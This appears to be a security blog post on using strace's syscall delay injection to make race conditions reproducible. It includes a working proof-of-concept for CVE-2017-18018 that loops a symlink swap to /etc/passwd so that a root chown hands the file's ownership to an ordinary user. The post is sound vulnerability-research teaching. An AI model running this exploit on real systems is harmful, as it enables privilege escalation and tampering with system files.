Exploiting Race Conditions with strace

As a security professional and hobbyist, I often deal with security vulnerabilities that are caused by race conditions. By their very nature, race conditions are nondeterministic, which makes them hard to diagnose, difficult to reproduce, and tedious to debug. They can cause serious security vulnerabilities and go quietly undetected for years. Once a race condition has been patched, it can be very difficult to prove that the race condition has been properly mitigated.

If there were a way to make race conditions behave deterministically, it would save time in the discovery and debugging phase of vulnerability research. Furthermore, the Proof of Concept (PoC) exploits for race conditions would more reliably reproduce the vulnerabilities. Luckily, strace v4.22 and later allow delays to be injected into specific system calls. By injecting delays into the target application, we can take some of the headache out of working with race conditions by ensuring that both the vulnerable code and the PoC exploit behave more predictably.

What Is a Race Condition?

Devopedia gives a clear definition of the term “race condition”:

Race condition in software is an undesirable event that can happen when multiple entities access or modify shared resources in a system. The system behaves correctly when these entities use the shared resources as expected. But sometimes due to uncontrollable delays, the sequence of operations may change due to relative timing of events. When this happens, the system may enter a state not designed for and hence fail. The “race” happens because this type of failure is dependent on which entity gains access to the shared resource first.

A program is only able to utilize the CPU when the kernel allows it. The kernel attempts to ensure that each program gets its fair share of time on the CPU. In order to do this, the kernel may periodically preempt the currently running process and resume it later. This means that, if there are two or more threads/processes that are simultaneously working with the same set of shared resources (e.g., files or memory addresses), we cannot know the order in which each process will operate on the shared resource in advance of runtime; it is nondeterministic. Race conditions can occur when the order in which these threads/processes operate on a shared resource is not properly controlled.
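To make the idea concrete, here is a minimal shell sketch of a check-then-use race. It is an illustration under stated assumptions, not code from any real application: the `victim` and `attacker` functions, the file names, and the `sleep` durations are all hypothetical. The `sleep` inside `victim` stands in for an unlucky preemption between the check and the use, which is what makes this run predictable.

```shell
#!/bin/sh
# Hypothetical demo of a check-then-use race; all names are illustrative.
workdir=$(mktemp -d)
echo "public" > "$workdir/data"
echo "secret" > "$workdir/secret"

# Victim: checks that the path is not a symlink, then reads it later.
victim() {
    if [ ! -L "$workdir/data" ]; then   # check
        sleep 2                         # window between check and use
        cat "$workdir/data"             # use: reads whatever is there now
    fi
}

# Attacker: replaces the file with a symlink while the victim is paused.
attacker() {
    sleep 1
    ln -s -f "$workdir/secret" "$workdir/data"
}

attacker &
result=$(victim)
wait
echo "victim read: $result"
rm -rf "$workdir"
```

Without the `sleep` in `victim`, the outcome would depend on how the kernel happens to schedule the two processes, which is exactly the nondeterminism described above.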

A Crash Course in strace

At a high level, what you need to understand about system calls is:

  1. An application cannot take any privileged action (e.g., accessing hardware) on its own.
  2. If an application wishes to perform some privileged operation, such as modifying a file’s permissions, it makes a request to the kernel. The kernel will then perform that operation on behalf of the application.
  3. System calls are the interface that the kernel provides so that applications can request privileged operations.

Figure 1. System Call Interface
Credit: https://manybutfinite.com/post/system-calls

For every way an application can interact with the rest of the system, the kernel provides a system call. Need to read or write a file? There’s a system call. Want to send traffic over the network? You’ll need a system call. Does the application need to allocate memory? You guessed it: system call.

The strace utility allows us to observe all of the system calls made by an application. For example, we can use strace to observe the chown command and learn how the chown command goes about changing the ownership of a file or directory:

root@sec-disco-amd64:~$ touch /tmp/testfile
root@sec-disco-amd64:~$ ls -l /tmp/testfile
-rw-r--r-- 1 root root 0 Dec 29 17:53 /tmp/testfile
root@sec-disco-amd64:~$ strace -f chown testuser /tmp/testfile 2>&1 | grep testfile
4446  execve("/usr/bin/chown", ["chown", "testuser", "/tmp/testfile"], 0x7ffcc48ddfa8 /* 16 vars */) = 0
4446  newfstatat(AT_FDCWD, "/tmp/testfile", {st_mode=S_IFREG|0644, st_size=0, ...}, AT_SYMLINK_NOFOLLOW) = 0
4446  fchownat(AT_FDCWD, "/tmp/testfile", 1001, -1, 0) = 0
root@sec-disco-amd64:~$ ls -l /tmp/testfile
-rw-r--r-- 1 testuser root 0 Dec 29 17:53 /tmp/testfile
root@sec-disco-amd64:~$ 

We can see in the last line of the strace output that the chown command uses the fchownat() system call to change the ownership of /tmp/testfile to the user with ID 1001. We can get more information about the fchownat() system call by consulting its man page: man 2 fchownat.
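Instead of piping through grep, strace can do the filtering itself with the -e trace option. The sketch below assumes a Linux machine where strace is installed and allowed to trace processes; if it is not, the script just reports that it skipped the trace. The temporary file names and the `trace_status` variable are illustrative. It changes a scratch file's owner to the current user, which needs no privileges.

```shell
#!/bin/sh
# Sketch: let strace filter by system call name instead of using grep.
target=$(mktemp)
trace_log=$(mktemp)

# -e trace=fchownat limits the trace to that one system call.
# -o writes the trace to a file, keeping it separate from chown's own output.
if command -v strace >/dev/null 2>&1 &&
   strace -f -e trace=fchownat -o "$trace_log" \
       chown "$(id -u)" "$target" 2>/dev/null; then
    trace_status=traced
    cat "$trace_log"
else
    # strace is missing, or tracing is not permitted in this environment.
    trace_status=skipped
    echo "strace unavailable; skipping trace"
fi

rm -f "$target" "$trace_log"
```

The exact lines in the trace depend on the chown implementation and the strace version, so no expected output is shown here.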

I could write 20 posts just on the usefulness of strace, but others have already done a great job. See the Further Reading section for more information about system calls and strace.

Using strace to Make Race Conditions More Deterministic

So, what does strace have to do with race conditions? Well, strace allows us to do more than just observe system calls; it allows us to tamper with those system calls, too. One way that strace allows us to tamper with system calls is by injecting delays.

By injecting delays into system calls, we are, in effect, coaxing the kernel into scheduling another process at a point of our choosing. When a delay is injected into a system call, the process making that call gets put to sleep. This frees up the CPU and prompts the kernel to schedule a different process to run. Thus, instead of waiting for the kernel to preempt the process at some unpredictable moment, we decide where the process pauses and for how long.

To inject delays into system calls, we use the -e inject option and provide a comma-separated list of system calls to tamper with, followed by the number of microseconds to delay each of those calls.

strace -e inject=LIST_OF_SYSTEM_CALLS:delay_exit=USECS COMMAND

The command below injects a delay of 1,000,000 microseconds (one second) into the newfstatat() and fchownat() system calls made by the chown command. The -o /dev/null option sends strace’s output to /dev/null to keep it from cluttering up the screen. The time command at the very beginning is optional; it reports the total run time. Since we’ve injected a one-second delay into two system calls that are each called once, the total delay added to the command is two seconds. Therefore, time should report a total run time of a little over two seconds.

$> time strace -e inject=newfstatat,fchownat:delay_exit=1000000 -o /dev/null chown testuser /tmp/testfile

real    0m2.014s
user    0m0.005s
sys     0m0.008s
$>

Note that strace allows the user to specify delay_enter, delay_exit, or both. This controls whether the delay occurs just before the system call executes or just after it returns.
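Because the delay is given in microseconds, it is easy to drop or add a zero by accident. The sketch below wraps the conversion in a small helper. `build_inject_expr` is a hypothetical function written for this post, not part of strace; it only builds the argument string for -e from a list of system calls, a phase (enter or exit), and a whole number of seconds.

```shell
#!/bin/sh
# build_inject_expr is a hypothetical helper, not part of strace.
# Usage: build_inject_expr SYSCALLS PHASE SECONDS
#   SYSCALLS  comma-separated system call names
#   PHASE     "enter" (delay before the call runs) or "exit" (delay after it)
#   SECONDS   whole seconds, converted to the microseconds strace expects
build_inject_expr() {
    case $2 in
        enter|exit) ;;
        *) echo "phase must be 'enter' or 'exit'" >&2; return 1 ;;
    esac
    printf 'inject=%s:delay_%s=%d\n' "$1" "$2" "$(( $3 * 1000000 ))"
}

exit_expr=$(build_inject_expr newfstatat,fchownat exit 1)
enter_expr=$(build_inject_expr fchownat enter 2)
echo "$exit_expr"    # inject=newfstatat,fchownat:delay_exit=1000000
echo "$enter_expr"   # inject=fchownat:delay_enter=2000000
```

The result can then be passed straight to strace, for example: strace -o /dev/null -e "$exit_expr" chown testuser /tmp/testfile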

Example: CVE-2017-18018

CVE-2017-18018 has been assigned to a race condition in the chown and chgrp commands. This race condition allows a regular user to potentially change the ownership of arbitrary files. A full explanation and a PoC exploit for this vulnerability can be found here.

I ran the PoC exploit on my local machine 10 times and found that it was never successful. Now, I’m sure if I ran it 1,000,000 times, it would be successful at least once, but I don’t always have the time or patience to script something up and allow it to run indefinitely until it succeeds. Below, you’ll see a slightly modified version of the PoC. It uses strace to increase the determinism of the vulnerable application (i.e., chown). By using the delay_exit capability of strace, I was able to successfully exploit the vulnerability 100% of the time.

  Terminal 1 (root)
  -----------------
  sudo mkdir -p /var/www/chown-test && cd /var/www
  sudo mkdir chown-test/foo
  sudo mkdir chown-test/bar
  sudo ln -s ../bar chown-test/foo/quux
  sudo touch chown-test/bar/baz

  Terminal 2 (testuser)
  -----------------------
  cd /var/www/chown-test/bar
  while true; do ln -s -f /etc/passwd ./baz; done;

  Terminal 1 (root)
  -----------------
  sudo strace -o /dev/null -e inject=fchownat:delay_exit=1000000 chown --recursive --verbose -L testuser chown-test
  ls -l /etc/passwd

This outputs:
  -rw-r--r-- 1 testuser root 1.5K 2017-12-17 18:34 /etc/passwd
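
When repeating the PoC, it can be handy to check the result in a script rather than reading ls output by eye. The sketch below is one way to do that, assuming a stat that supports the -c FORMAT option (as GNU coreutils does). `owner_uid` is a hypothetical helper, and the demo runs against a scratch file rather than /etc/passwd so that it is safe to run anywhere.

```shell
#!/bin/sh
# owner_uid is a hypothetical helper; it assumes stat supports -c FORMAT.
owner_uid() {
    stat -c '%u' "$1"
}

# Demonstrate on a scratch file created by the current user.
scratch=$(mktemp)
scratch_owner=$(owner_uid "$scratch")
my_uid=$(id -u)

if [ "$scratch_owner" -eq "$my_uid" ]; then
    echo "$scratch is owned by uid $scratch_owner (the current user)"
fi
rm -f "$scratch"
```

After the PoC has run, a nonzero result from owner_uid /etc/passwd indicates that the ownership change went through. Running sudo chown root /etc/passwd puts the original owner back.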

Further Reading

Race Conditions

System Calls and strace

CVE-2017-18018